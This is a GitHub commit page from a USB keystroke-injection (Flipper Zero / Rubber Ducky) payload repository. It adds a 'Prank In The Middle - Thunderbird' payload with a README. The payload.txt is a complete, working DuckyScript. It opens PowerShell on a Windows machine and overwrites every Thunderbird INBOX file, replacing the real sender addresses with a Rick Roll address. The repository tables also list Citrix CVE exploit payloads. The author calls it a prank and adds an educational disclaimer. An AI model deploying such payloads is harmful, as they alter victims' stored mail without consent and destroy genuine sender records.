Skip to content

Commit

Permalink
Prank In The Middle - Thunderbird
Browse files Browse the repository at this point in the history 
The name of the payload `Prank In The Middle` is named after the pun Prank + Man In The Middle in that this operation, in some ways, can remotely be configured as a MITM attack but since it was created specifically for playful purposes then here is the reason for the union with the word Prank.
  • Loading branch information
@aleff-github
aleff-github committed Jun 3, 2024
1 parent e8a4dd5 commit 272beea
Show file tree
Hide file tree
Showing 4 changed files with 215 additions and 4 deletions.
10 changes: 6 additions & 4 deletions README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -31,12 +31,13 @@

|Type|Count|
|--|--|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|29|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|44|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|30|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|45|
|![iOS](https://img.shields.io/badge/iOS-000000?style=for-the-badge&logo=ios&logoColor=white)|4|
|![macOS](https://img.shields.io/badge/mac%20os-000000?style=for-the-badge&logo=macos&logoColor=F0F0F0)|0 [Buy me a Mac](https://github.com/sponsors/aleff-github?frequency=one-time&sponsor=aleff-github) :-)|
|**Tot**|77|
|Hak5|41|
|**Tot**|79|
|Hak5 Payload accepted|111|
|Hak5 Payload Awarded|2|


## Payloads
Expand Down Expand Up @@ -117,6 +118,7 @@
|![iOS](https://img.shields.io/badge/iOS-000000?style=for-the-badge&logo=ios&logoColor=white)|Prank|[Delete A Reminder With An iPhone](https://github.com/aleff-github/my-flipper-shits/tree/main/iOS/Prank/Delete_A_Reminder_With_An_iPhone)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Prank|[(Kali Linux) This_damn_shell_doesn_t_work___so_sad!](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Prank/This_damn_shell_doesn_t_work___so_sad!-KALI)|🟢|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Prank|[(Linux) This_damn_shell_doesn_t_work___so_sad!](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Prank/This_damn_shell_doesn_t_work___so_sad!-LINUX)|🟢|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Prank In The Middle - Thunderbird](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/Prank_In_The_Middle_Thunderbird)|🟢|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Indicent Response|[Auto-Check Cisco IOS XE Backdoor based on CVE-2023-20198 and CVE-2023-20273](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Incident_Response/Auto-Check_Cisco_IOS_XE_Backdoor_based_on_CVE-2023-20198_and_CVE)|🔴|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Indicent Response|[Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Incident_Response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966)|🔴|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Indicent Response|[Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Incident_Response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966)|🔴|
Expand Down
95 changes: 95 additions & 0 deletions Windows/Prank/Prank_In_The_Middle_Thunderbird/README.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,95 @@
# Prank In The Middle - Thunderbird

The name of the payload `Prank In The Middle` is named after the pun Prank + Man In The Middle in that this operation, in some ways, can remotely be configured as a MITM attack but since it was created specifically for playful purposes then here is the reason for the union with the word Prank.

**Category**: Prank

**Plug-And-Play** ^^

## Index

- [Description](#description)
- [Requirements](#requirements)
- [How the Program Works](#how-the-program-works)
- [Code Details](#code-details)
- [System Detection && Short Start DELAY](#system-detection--short-start-delay)
- [Navigating in Thunderbird](#navigating-in-thunderbird)
- [Opening PowerShell and Email Manipulation](#opening-powershell-and-email-manipulation)
- [The Regex](#the-regex)
- [Notes](#notes)
- [Credits](#credits)

## Description

This program automates a series of actions on a Windows system (*tested on Windows 10 but should works in Windows 11*) to manipulate the contents of emails found in a Thunderbird profile. Specifically, it identifies emails in the `INBOX` file of each configured email account and replaces the sender's email addresses with a fictitious address `[email protected]/prinkrollme` where `prinkrollme` is the union of the words `Prank`, `Rick Roll` and `Me` (*this one was necessary becouse prinkwoll era già stato preso* **:c** *so sad...* ) all compressed into the link `tinyurl.com/prinkrollme` ([*3° note*](#notes)) that redirect to the YouTube video `https://www.youtube.com/watch?v=xMHJGd3wwZk`.

![](https://i.ibb.co/VJjfbkJ/1.png)

## Requirements

- A Windows system with Thunderbird installed.
- Access to PowerShell.
- Permissions to run code in Powershell

## Test Environment

- Thunderbird 115.11.1 (64 bit)
- Windows 10 Pro

## How the Program Works

1. **System Detection:** The program detects if the system reflects the CAPSLOCK state and sets a dynamic delay based on this.
2. **Opening Thunderbird:** Uses a series of commands to open Thunderbird and navigate to the profile folder settings.
3. **Copying the Profile Folder Path:** Copies the profile folder path to the clipboard.
4. **Opening PowerShell:** Opens a PowerShell window and navigates to the `ImapMail` folder of the Thunderbird profile.
5. **Email Manipulation:** Uses PowerShell to:
- Find all `INBOX` folders within `ImapMail`.
- Read the contents of the emails in `INBOX`.
- Replace the sender addresses with `Rick Roll <[email protected]/prinkrollme>`.
- Save the modified content back to the original email files.

## Code Details

For reasons of space, the code is not given in the documentation. However, comments can be found that broadly explain the piece of code that is executed following the comment itself.

### The Regex

The regex was not created from scratch but was taken from the discussion “[How can I validate an email address using a regular expression?](https://stackoverflow.com/questions/201323/how-can-i-validate-an-email-address-using-a-regular-expression)” posted on **StackOverflow**.

```plaintext
(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|`"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*`")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])
```

The only difference is the addition of `**From: <...>**` which reduces to just the email addresses that sent the emails and not all addresses detected in the file that might depict other references

```plaintext
From:\s.*\s<...>
```

## Notes

1) This program was created for educational and demonstrative purposes. Unauthorized alteration of emails is illegal, and violating others' privacy is a crime.
2) Ensure you have the necessary permissions before running any script that modifies personal or sensitive data.
3) Considering [Staged Payloads](https://github.com/hak5/usbrubberducky-payloads?tab=readme-ov-file#staged-payloads), generally, it is not possible to include code that downloads from external sources. In this case, however, the setup involves a redirect to a YouTube video, which has been conveniently shortened using `tiny.url`. It is important to note that this redirect can be modified, and I strongly recommend changing it to a personal link for your security. While I assure you that I will never alter the link, no one can guarantee that I won't be compromised, allowing someone else to alter the redirect. It is always advisable and a good practice to never use links found online without understanding the actual redirect and replacing it with your own link.

## Credits

<h2 align="center"><a href="https://aleff-gitlab.gitlab.io/">Aleff</a></h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
113 changes: 113 additions & 0 deletions Windows/Prank/Prank_In_The_Middle_Thunderbird/payload.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,113 @@
REM #####################################################
REM # #
REM # Title : Prank In The Middle - Thunderbird #
REM # Author : Aleff #
REM # Version : 1.0 #
REM # Category : Prank #
REM # Target : Windows 10/11 #
REM # #
REM #####################################################

REM Open Thunderbird and goto settings
WIN r
STRING thunderbird
ENTER
DELAY 1000
REPEAT 4 TAB
ENTER
DELAY 500
REPEAT 2 UPARROW
ENTER
DELAY 500
REPEAT 3 UPARROW
ENTER
DELAY 500

REM Goto profile directory
REPEAT 11 TAB
ENTER
DELAY 500

REM Copy the directory path
REPEAT 4 TAB
DELAY 500
SPACEBAR
DELAY 500
ENTER
DELAY 500
CTRL c
DELAY 500
ALT F4
DELAY 500

REM Open the powershell and goto the directory
WIN r
STRING powershell
ENTER
DELAY 1500
STRING cd
DELAY 500
CTRL v
DELAY 500
ENTER
DELAY 500

REM Get the INBOX content and edit it overwriting. Then close the powershell
STRING cd ImapMail
ENTER
DELAY 500
STRING $directories = Get-ChildItem -Directory | Select-Object FullName
ENTER
DELAY 500
STRING foreach ($dir in $directories) {
ENTER
DELAY 500
STRING # Replace backslashes with slash
ENTER
DELAY 500
STRING $newPath = $dir.FullName -replace '\\', '/'
ENTER
DELAY 500
STRING # Add the sub-string “/INBOX” to the end
ENTER
DELAY 500
STRING $newPath += "/INBOX"
ENTER
DELAY 500
STRING # Check whether the INBOX file exists
ENTER
DELAY 500
STRING if (Test-Path $newPath) {
ENTER
DELAY 500
STRING # Check whether the INBOX file exists
ENTER
DELAY 500
STRING $emails = Get-Content -Path $newPath -Raw
ENTER
DELAY 500
STRING # Replace email sender with Rick Roll!
ENTER
DELAY 500
STRING # The following operation is simplified and assumes that the sender starts with “From: ...”
ENTER
DELAY 500
STRING # and does not contain complex MIME structures
ENTER
DELAY 500
STRING $modifiedEmails = $emails -replace "From:\s.*\s<(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|`"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*`")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])>", "From: Rick Roll <[email protected]/prinkrollme>"
ENTER
DELAY 500
STRING # Write the modified content into the INBOX file.
ENTER
DELAY 500
STRING Set-Content -Path $newPath -Value $modifiedEmails -Force
ENTER
DELAY 500
STRING }
ENTER
DELAY 500
STRING }
ENTER
DELAY 1000
ALT F4
1 change: 1 addition & 0 deletions Windows/README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -73,6 +73,7 @@
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Pranh(ex)](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/Pranh(ex))|🟢|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Send Email Through Thunderbird](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/SendEmailThroughThunderbird)|🟢|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Change Github Profile Settings](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/Change_Github_Profile_Settings)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Prank In The Middle - Thunderbird](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/Prank_In_The_Middle_Thunderbird)|🟢|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Incident Response|[Defend yourself against CVE-2023-36884 Office and Windows HTML Remote Code Execution Vulnerability](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/incident_response/Defend_yourself_against_CVE-2023-36884_Office_and_Windows_HTML_Remote_Code_Execution_Vulnerability)|🟢|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Indicent Response|[Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Incident_Response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966)|🔴|
|//|Prank|[Flipper Zero GIF](img/gif)|🟢|
Expand Down

0 comments on commit 272beea

Please sign in to comment.